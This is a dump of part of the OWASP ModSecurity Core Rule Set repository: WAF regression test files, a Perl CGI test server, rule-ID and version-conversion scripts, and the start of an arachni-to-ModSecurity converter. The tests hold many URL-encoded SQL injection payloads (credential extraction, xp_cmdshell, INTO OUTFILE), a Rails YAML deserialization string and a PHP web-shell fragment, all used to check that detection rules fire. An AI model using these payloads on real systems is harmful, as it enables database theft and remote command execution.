Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test PHP Injection Attack (958976) 
################################### %output 958976|958977 %var php_code=%20%20if%20(!function_exists(%22fs_copy_dir%22))%20%7B%0A%20%20%20%20function%20fs_copy_dir(%24d%2C%24t)%20%7B%0A%20%20%20%20%20%20%24d%20%3D%20str_replace(%22%5C%5C%22%2CDIRECTORY_SEPARATOR%2C%24d)%3B%0A%20%20%20%20%20%20if%20(substr(%24d%2C-1)%20!%3D%20DIRECTORY_SEPARATOR)%20%7B%24d%20.%3D%20DIRECTORY_SEPARATOR%3B%7D%0A%20%20%20%20%20%20%24h%20%3D%20opendir(%24d)%3B%0A%20%20%20%20%20%20while%20((%24o%20%3D%20readdir(%24h))%20!%3D%3D%20FALSE)%20%7B%0A%20%20%20%20%20%20%20%20if%20((%24o%20!%3D%20%22.%22)%20and%20(%24o%20!%3D%20%22..%22))%20%7B%0A%20%20%20%20%20%20%20%20%20%20if%20(!is_dir(%24d.DIRECTORY_SEPARATOR.%24o))%20%7B%24ret%20%3D%20copy(%24d.DIRECTORY_SEPARATOR.%24o%2C%24t.DIRECTORY_SEPARATOR.%24o)%3B%7D%0A%20%20%20%20%20%20%20%20%20%20else%20%7B%24ret%20%3D%20mkdir(%24t.DIRECTORY_SEPARATOR.%24o)%3B%20fs_copy_dir(%24d.DIRECTORY_SEPARATOR.%24o%2C%24t.DIRECTORY_SEPARATOR.%24o)%3B%7D%0A%20%20%20%20%20%20%20%20%20%20if%20(!%24ret)%20%7Breturn%20%24ret%3B%7D%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20closedir(%24h)%3B%0A%20%20%20%20%20%20return%20TRUE%3B%0A%20%20%20%20%7D %var 
php_code=echo%20sr(15%2C%22%3Cb%3E%22.%24lang%5B%24language.'_text16'%5D.%24arrow.%22%3C%2Fb%3E%22%2C%22%3Cselect%20name%3D%5C%22method%5C%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22system%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22system%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Esystem%3C%2Foption%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22passthru%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22passthru%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Epassthru%3C%2Foption%3E%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22exec%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22exec%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Eexec%3C%2Foption%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22shell_exec%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22shell_exec%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Eshell_exec%3C%2Foption%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22popen%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22popen%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Epopen%3C%2Foption%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22proc_open%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22proc_open%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Eproc_open%3C%2Foption%3E %request POST / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate 
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: $CONTENT_LENGTH body=$php_code %endtest �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_41_sql_injection_attacks.tests������������������������������������������������������0000775�0000000�0000000�00000021007�12164572564�0037350�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests���������������������������������������������������������������������������������������������������%timeout 10 # File 41 SQL Injection Attacks %request GET /?v=$sig HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0. 
Keep-Alive: 300 Proxy-Connection: keep-alive %test SQL Comment Sequence Detected (981231) ######################################## %output 981231 %var sig=SELECT%2F*avoid-spaces*%2Fpassword%2F**%2FFROM%2F**%2FMembers %var sig=%E2%80%98%20or%201%3D1%23%0A %var sig=%E2%80%98%20or%201%3D1--%20- %endtest %test SQL Hex Encoding Identified (981260) ######################################## %output 981260 %var sig=1%20and%201%3D0%20%20Union%20Select%20%20%20UNHEX(HEX(concat(0x5B6B65795D%2Ctable_name%2C0x5B6B65795D)))%20%20%20FROM%20INFORMATION_SCHEMA.tables%20where%20table_schema%3DConcat(char(109)%2Cchar(101)%2Cchar(115)%2Cchar(115)%2Cchar(110)%2Cchar(101)%2Cchar(114)%2Cchar(98)%2Cchar(95)%2Cchar(119)%2Cchar(114)%2Cchar(100)%2Cchar(49)%2Cchar(50))%20LIMIT%201%2C1-- %var sig=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536-- %endtest %test SQL Injection Attack: Common Injection Testing Detected (981318) ######################################## %output 981318 %var sig='%20and%200%20union%20select%201%2C2%2C3%2Cusername%2C5%2Cpassword%2C7%2C8%2C9%2C10%2C11%20from%20%23__users%23 %var sig=-1)%20UNION%20SELECT%201%2C2%2C3%2Cconcat(USER()%2C' %endtest %test SQL Injection Attack: SQL Operator Detected (981319) ######################################## %output 981319 %var sig=-4%20union%20select%201%2C2%2C(select(%40x)from(select(%40x%3A%3D0x00)%2C(select(null)from(information_schema.columns)where(table_schema!%3D0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(%40x%3A%3Dconcat(%40x%2C0x3c62723e%2Ctable_schema%2C0x2e%2Ctable_name%2C0x3a%2Ccolumn_name))))x)-- %var sig=14380586%20and%20user()%3C%3E1 %var sig=2946%20and%20ascii(substring((user())%2C1%2C1))%3E%3D1%2F* %endtest %test SQL Injection Attack: SQL Tautology Detected (950901) ######################################## %output 950901 %var sig=-9'%20union%20select%20concat(version())%2C2%2C3%2C4%2C5%2C6and'1'%3D'1 %var sig=1'%20or%20'1'!%3D'2%20order%20by%201-- %endtest %test SQL Injection 
Attack: Common DB Names Detected (981320) ######################################## %output 981320 %var sig=3%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2Cconcat(user()%2Cversion()%2Cdatabase())%2C8%20from%20information_schema.tables %var sig=918%20union%20select%200%2C1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%20from%20msysobjects%20in%20'.' %endtest %test SQL SELECT Statement Anomaly Detection Alert (981317) ######################################## %output 981317 %var sig=247'%20and%201%3D1%20union%20all%20select%201%2C2%2C3%2C4%2C5%2Cconcat(username%2Cchar(58)%2Cpasswort)%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%20from%20az_user%2F* %var sig=5%20and%201%3D(select%20first%201%20distinct%20rdb%24relation_name%20from%20rdb%24relations%20where%20rdb%24system_flag%3D0)-- %endtest %test Blind SQL Injection Attack (950007) ######################################## %output 950007 %var sig=-2511%20union%20select%20table_name%20from%20sys.all_tables-- %var sig=1%20union%20select%201%2Cnull%2Cnull%2Cnull%2Ctable_name%7C%7Cchr(58)%7C%7Ccolumn_name%7C%7Cchr(58)%7C%7Cdata_type%20from%20(select%20a.*%2Crownum%20rnum%20from%20(select%20*%20from%20user_tab_columns%20where%20table_name%3Dchr(76)%7C%7Cchr(79)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(83)%20order%20by%20column_name)%20a%20where%20rownum%20%3C%3D%201)%20where%20rnum%20%3E%3D%201-- %endtest %test SQL Injection Attack (950001) ######################################## %output 950001 %var sig=10%20UNION%20exec%20master..xp_cmdshell%20'dir' %var sig=1'%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(mid(concat_ws(0x0b%2Cversion()%2Cuser()%2Cdatabase()%2C%40%40version_compile_os%2C0x0b)%2C1%2C63)%2C%20floor(rand(0)*2)))-- %endtest %test SQL Injection Attack (959070) ######################################## %output 959070 %var 
sig=-247%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2Cconcat_ws(0x3a%2Cversion()%2Cdatabase()%2CuseR())%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%0A1%20having%201%3D1-- %var sig=256%20%20AND%201%3Cascii(substring((SELECT%20column_name%20FROM%20information_schema.columns%20WHERE%20table_name%20like%20char(105%2C109%2C103%2C101%2C115)%20limit%201%2C1)%2C1%2C1)) %endtest %test SQL Injection Attack (959071) ######################################## %output 959071 %var sig=1'%20or%201%3D(SELECT%20TOP%201%20email%20FROM%20cdrequests%20where%20id%3D2000)-- %var sig=1'%20or%20'1'%3D'1%20order%20by%201-- %endtest %test SQL Injection Attack (959072) ######################################## %output 959072 %var sig=99999999%20and%201%3D2%20union%20select%201%2Cconcat(user()%2Cchar(58)%2Cversion()%2Cchar(58)%2Cdatabase())%2C3%2C4%2F* %var sig=-9'%20union%20select%20concat(version())%2C2%2C3%2C4%2C5%2C6%2Cand'1'%3D'1 %endtest %test SQL Injection Attack (950908) ######################################## %output 950908 %var sig=6%20AND%20ASCII(SUBSTR((COALESCE(5%2C%20NULL))%2C%201%2C%201))%20%3E%2063 %endtest %test SQL Injection Attack (959073) ######################################## %output 959073 %var sig=-120%20union%20all%20select%201%2Ccast(table_name%20as%20text)%20from%20information_schema.columns-- %var sig=-1100%20UNION%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2Cconcat_ws(0x2b%2Cversion()%2Cuser()%2C%40%40version_compile_os)%2C10%2C11%2C12%20-- %endtest %test Detects blind sqli tests using sleep() or benchmark() (981272) ######################################## %output 981272 %var 
sig=-207%20union%20select%201%2Cconcat(%40i%3A%3D0x00%2C%40o%3A%3D0x0d0a%2Cbenchmark(23%2C%40o%3A%3DCONCAT(%40o%2C0x0d0a%2C(SELECT%20concat(table_schema%2C0x2E%2C%40i%3A%3Dtable_name)%20from%20information_schema.tables%20WHERE%20table_name%3E%40i%20order%20by%20table_name%20LIMIT%201)))%2C%40o)%2C3%2C4%2C5-- %var sig=13%20and%20sleep(3)%23 %endtest %test Detects basic SQL authentication bypass attempts 1/3 (981244) ######################################## %output 981244 %var sig=aaa'%20or%20(1)%3D(1)%20%23!asd %var sig=aa'%20LIKE%20md5(1)%20or%20'1 %endtest %test Detects MSSQL code execution and information gathering attempts (981255) ######################################## %output 981255 %var sig='%20union%20select%20concat(UserId%2Cchar(58)%2CUserPassword)%20from%20users%20into%20outfile%20'content%2F1.php'%2F* %var sig=1'%20or%201%3D(%40%40version%20)%3Bexec%20master..xp_cmdshell %endtest %test Detects MySQL comment-/space-obfuscated injections and backtick termination (981257) ######################################## %output 981257 %var sig=1%0bAND(SELECT%0b1%20FROM%20mysql.x) %endtest %test Detects chained SQL injection attempts 1/2 (981248) ######################################## %output 981248 %var sig=0%20div%201%20-%20union%23foo*%2F*bar%0Aselect%23foo%0A1%2C2%2Ccurrent_user %endtest %test Detects SQL benchmark and sleep injection attempts including conditional queries (981250) ######################################## %output 981250 %var sig=SELECT%20BENCHMARK(1000000%2CMD5(%E2%80%98A%E2%80%99))%3B %var sig=SELECT%20SLEEP(5)%3B%20%23%20%3E%3D%205.0.12 %endtest %test Detects conditional SQL injection attempts (981241) ######################################## %output 981241 %var sig=1194%20or%201%20group%20by%20concat(version()%2Cfloor(rand(0)*2))having%20min(0)%20or%201-- %endtest %test Detects MySQL charset switch and MSSQL DoS attempts (981252) ######################################## %output 981252 %var 
sig=-1'%3B%20if%20'1'%3D'1'%3B%20waitfor%20time%20'00%3A00%3A01'-- %endtest %test Detects MATCH AGAINST, MERGE, EXECUTE IMMEDIATE and HAVING injections (981256) ######################################## %output 981256 %var sig=-148)%20or%201%20group%20by%20concat(%40%40version%2Cfloor(rand(0)*2))%20having%20min(0)%20or%201%20-- %endtest %test Detects basic SQL authentication bypass attempts 2/3 (981245) ######################################## %output 981245 %var sig=-121%20union%20all%20select%201%2Cgroup_concat(Username%2C0x3a%2CPassword%2C0x3a%2CUserGroup)%2C3%2C4%2C5%20from%20uvp_Users %var sig=-10'%20union%20select%201%2Cconcat_ws(0x3a%2Ctable_name%2Ctable_schema)%2C3%20from%20information_schema.columns%20where%20column_name%20like%20'name'%23 %endtest �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_41_xss_attacks.tests����������������������������������������������������������������0000664�0000000�0000000�00000001103�12164572564�0035314�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests���������������������������������������������������������������������������������������������������%timeout 10 # FILE 41 - XSS Attacks %test Cross-site Scripting Attack ##################################################### %output 958414 %var xss= %request GET /?foo=$xss HTTP/1.0 Host: $hostname User-Agent: 
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %endtest �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_50_outbound.tests�������������������������������������������������������������������0000775�0000000�0000000�00000012757�12164572564�0034650�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests���������������������������������������������������������������������������������������������������# FILE 50 %timeout 10 %test weblogic information disclosure ######################################## %event 970021 %output 970021 %request GET /cgi-bin/testserver.cgi HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive Response-Status: 500 Internal Server Error Response-Content: <title>JSP compile error %endtest %test Zope information leakage ######################################## %event 970007 %output 970007 %request GET /cgi-bin/testserver.cgi 
HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive Response-Content:

Site Error

An error was encountered while publishing this resource. %endtest %test CF information leakage ######################################## %event 970008 %output 970008 %request GET /cgi-bin/testserver.cgi HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive Response-Content: The error occurred in script.cfm: line 11 bla bla bla Please try the following:
Check the ColdFusion documentation to verify that you are using the correct syntax. bla bla Stack Trace (click to expand) %endtest %test PHP information leakage ######################################## %event 970009 %output 970009 %request GET /cgi-bin/testserver.cgi HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive Response-Content: Warning mysql_fetch_row(): supplied argument ... in /web/jvcjazz/intl_view.php on line 142 %endtest %test ISA server existence revealed ######################################## %event 970010 %output 970010 %request GET /cgi-bin/testserver.cgi HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive Response-Content: 403 Forbidden - The ISA Server denies the specified Uniform Resource ...bla bla bla... 
Internet Security and Acceleration Server %endtest %test Local file link ######################################## %event 970011 %output 970011 %request GET /cgi-bin/testserver.cgi HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive Response-Content: This is my sensitive data, do not touch %endtest %test Microsoft office doc properties leakage ######################################## %event 970012 %output 970012 %request GET /cgi-bin/testserver.cgi HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive Response-Content: %endtest %test Directory Listing (apache) ######################################## %event 970013 %output 970013 %request GET /cgi-bin/testserver.cgi HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive Response-Content: Index of /~avi

Index of /~avi

%endtest %test CF source code leakage ######################################## %event 970016 %output 970016 %request GET /cgi-bin/testserver.cgi HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive Response-Content: %test Ruby on Rails Vuln - CVE-2013-0156 - 1 ######################################## %output 999010 %var sig=--- !ruby/object:UnsafeObject attribute1: value1 %var sig=--- !ruby/string:Arel::Nodes::SqlLiteral \"' OR '2' < '6';--\" %var type=yaml %endtest SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/testserver.cgi000066400000000000000000000014201216457256400277100ustar00rootroot00000000000000#!/usr/bin/perl use CGI qw/:standard/; $response_status = http('Response-Status') || "200 OK"; $response_content = http('Response-Content'); $response_type = http('Response-Content-Type') || "text/html"; $response_new_header_name = http('Response-Header-Name'); $response_new_header_value = http('Response-Header-Value'); $response_new_header = defined($response_new_header_name) ? $response_new_header_name . ': ' . 
$response_new_header_value : undef; if (defined($response_new_header)) { print header ($response_type, $response_status, undef, undef, undef, undef, undef, undef, undef,$response_new_header); } else { print header ($response_type, $response_status); } print start_html('rule set tester'); print h1('rule set tester'); print $response_content; SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/rule-management/000077500000000000000000000000001216457256400245625ustar00rootroot00000000000000SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/rule-management/id-range000066400000000000000000000000361216457256400261720ustar00rootroot00000000000000900000-2999999 2000000-299999 SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/rule-management/remove-2.7-actions.pl000066400000000000000000000057161216457256400303670ustar00rootroot00000000000000#!/opt/local/bin/perl ############################################# # -=[ Virtual Patching Converter Script ]=- # # Converts to previous modsec versions # # # # modsec2modsec.pl # # Version: 1.0 # # # # Copyright 2013 # # Mathieu Parent # ############################################# use strict; use warnings; use Getopt::Std; use File::Find (); use File::Copy; # Parse options my %opts; getopts("t:f:nvd",\%opts); my $target_version = $opts{'t'}; my $filename = $opts{'f'}; my $no_backup = $opts{'n'}; my $verbose = $opts{'v'}; my $debug = $opts{'d'}; # Check options unless ($target_version && $filename) { print "Flag:\n\n". "\t -t:\t target version\n". "\t -f:\t file or directory to convert\n". "\t -n:\t no backup file\n". "\t -v:\t be verbose\n". "\t -d:\t debug\n". "Usage:\n\n". "\t./modsec2modsec.pl -t 2.6 -f .\n\n"; exit 1; } unless ($target_version eq '2.6') { print "Unknown target version $target_version. 
Use one of: 2.6.\n"; exit 1; } my @target_version = split( /\./, $target_version ); # Suffixes my $bck = '.old'; # Backup suffix my $tmp = '.tmp'; # Tempfile suffix # Traverse directory File::Find::find({wanted => \&process, no_chdir => 1}, $filename); exit 0; sub target_version_below { # Caveats: Only versions X.Y are supported my @ver = split( /\./, shift ); return ( $target_version[0] < $ver[0] || $target_version[1] < $ver[1] ); } sub process { my ($dev,$ino,$mode,$nlink,$uid,$gid); (($dev,$ino,$mode,$nlink,$uid,$gid) = lstat($_)) && -f _ && /^.*\.conf\z/s && process_file($File::Find::name); } sub process_file { my $filename = shift; print "Processing $filename\n" if $verbose; # Clean up any remaining tempfile if (-f "$filename$tmp") { print "Deleting $filename$tmp\n" if $debug; unlink "$filename$tmp" or die "Unable to delete $filename$tmp: $!"; } # Open both input and output open(my $input, '<', $filename) or die "Unable to open $filename: $!"; open(my $output, '>', "$filename$tmp") or die "Unable to open $filename$tmp: $!"; # Read input line by line while (<$input>) { if (target_version_below('2.7')) { s/ver:'[^']+',//; s/maturity:'[^']+',//; s/accuracy:'[^']+',//; } print $output $_; } close($input); close($output); if (!$no_backup && -f "$filename$bck") { print "Deleting $filename$bck\n" if $debug; unlink "$filename$bck" or die "Unable to delete $filename$bck: $!"; } if (!$no_backup) { print "Moving $filename to $filename$bck\n" if $debug; move($filename, "$filename$bck") or die "Unable to move $filename to $filename$bck: $!"; } print "Moving $filename$tmp to $filename\n" if $debug; move("$filename$tmp", $filename) or die "Unable to open $filename$tmp to $filename: $!"; } SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/rule-management/verify.rb000077500000000000000000000064701216457256400264250ustar00rootroot00000000000000#!/usr/bin/env ruby # -*- coding: utf-8 -*- # # Copyright © 2012 Diego Elio Pettenò # # Permission to use, copy, modify, and distribute this 
software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND INTERNET SOFTWARE CONSORTIUM DISCLAIMS # ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES # OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL INTERNET SOFTWARE # CONSORTIUM BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL # DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR # PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS # ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS # SOFTWARE. require 'set' seen_ids = Set.new res = 0 # read reserved id range from the id-range file so that it can be # configured on a per-repository basis. range = Range.new(*File.read('id-range').rstrip.split('-').map(&:to_i)) # open all the rule files Dir.chdir("../../") Dir["**/*.conf"].each do |rulefile| # read the content content = File.read(rulefile) lineno = 0 this_chained = next_chained = false prevline = nil # for each line in the rule file content.each_line do |line| lineno += 1 # handle continuation lines line = (prevline + line) unless prevline.nil? # remove comments line.gsub!(/^([^'"]|'[^']+'|"[^"]+")#.*/) { $1 } if line =~ /\\\n$/ prevline = line.gsub(/\\\n/, '') next else prevline = nil end # skip if it's an empty line (this also skip comment-only lines) next if line =~ /(?:^\s+$|^#)/ this_chained = next_chained next_chained = false # split the directive in its components, considering quoted strings directive = line.scan(/([^'"\s][^\s]*[^'"\s]|'(?:[^']|\\')*[^\\]'|"(?:[^"]|\\")*[^\\]")(?:\s+|$)/).flatten directive.map! do |piece| # then make sure to split the quoting out of the quoted strings (piece[0] == '"' || piece[0] == "'") ? 
piece[1..-2] : piece end # skip if it's not a SecRule or SecAction case directive[0] when "SecRule" rawrule = directive[3] when "SecAction" rawrule = directive[1] else next end # get the rule and split in its components rule = (rawrule || "").gsub(/(?:^"|"$)/, '').split(/\s*,\s*/) if rule.include?("chain") next_chained = true end ids = rule.find_all { |piece| piece =~ /^id:/ } if ids.size > 1 $stderr.puts "#{rulefile}:#{lineno} rule with multiple ids" next elsif ids.size == 0 id = nil else id = ids[0].sub(/^id:/, '').gsub(/(?:^'|'$)/, '').to_i end if this_chained unless id.nil? $stderr.puts "#{rulefile}:#{lineno} chained rule with id" res = 1 end next elsif id.nil? $stderr.puts "#{rulefile}:#{lineno} rule missing id (#{rule.join(',')})" res = 1 next elsif ! range.include?(id) $stderr.puts "#{rulefile}:#{lineno} rule with id #{id} outside of reserved range #{range}" res = 1 elsif seen_ids.include?(id) $stderr.puts "#{rulefile}:#{lineno} rule with duplicated id #{id}" res = 1 end seen_ids << id end end exit res SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/virtual-patching/000077500000000000000000000000001216457256400247625ustar00rootroot00000000000000SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/virtual-patching/arachni2modsec.pl000077500000000000000000000306461216457256400302150ustar00rootroot00000000000000#!/opt/local/bin/perl -T ############################################# # -=[ Virtual Patching Converter Script ]=- # # Converts arachni XML Ouput # # https://github.com/Zapotek/arachni # # # # arachni2modsec.pl # # Version: 1.0 # # # # Copyright 2011 # # Trustwave's SpiderLabs Research Team # # www.trustwave.com # # # # Based On Code Originally Created by: # # The Denim Group # # www.denimgroup.com # ############################################# use XML::Smart; use Switch; use Data::Types qw(:all); use Data::Validate::URI qw(is_uri); use Getopt::Std; use Acme::Comment type=>'C++', one_line=>1; #Block commenting, can be removed later ############# # Variables # 
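#############

# [Configuration Vars]

# -f takes an argument: the path of the arachni XML report to convert.
my %param;
getopt("f",\%param);
$filename = $param{f};
my $all_vulnerabilities_filename = "$filename";

# Without a report path there is nothing to convert: print the usage text
# and stop. This is a usage error, so exit with a non-zero status, letting a
# calling script tell it apart from a successful run.
unless ($filename) {
    print "Flag:\n\n\t -f:\t path to arachni xml report file\nUsage:\n\n\t./arachni2modsec.pl -f ./arachni_report.xml\n\n";
    exit 1;
}

# Output file for the generated rules. The main section opens it with '>',
# so an existing file of this name in the current directory is truncated on
# every run.
#
# NOTE(review): generate_patch() interpolates the report's url and variable
# values straight into the SecRule text. Only the URL is checked (is_uri in
# parseData); the parameter name is only tested for being non-empty, and
# neither value is escaped for quotes or regex metacharacters. Treat the
# report as untrusted input and review the generated file before activating
# it.
my $modsec_rules_file = "./modsecurity_crs_48_virtual_patches.conf";

# [End Config Vars]

# Issue names as they appear in the report's issue 'name' values; the main
# loop matches them exactly against @supported_vulns.
my $VULN_CLASS_XSS = "Cross-Site Scripting (XSS)";
my $VULN_CLASS_SQLI = "SQL Injection";
my $VULN_CLASS_BLIND_SQLI = "Blind SQL Injection";
my $VULN_CLASS_LFI = "Path Traversal";
my $VULN_CLASS_RFI = "Remote file inclusion";
my $VULN_CLASS_HTTPRS = "Response splitting";

# NOTE(review): parseData also compares against $VULN_CLASS_PRL and
# $VULN_CLASS_DI, which are not declared anywhere in this script.

# Only the vulnerabilities in this array will have
# rules generated for them.
my @supported_vulns = ($VULN_CLASS_XSS, $VULN_CLASS_SQLI, $VULN_CLASS_BLIND_SQLI, $VULN_CLASS_LFI, $VULN_CLASS_RFI, $VULN_CLASS_HTTPRS);

# Counters reported in the end-of-run summary.
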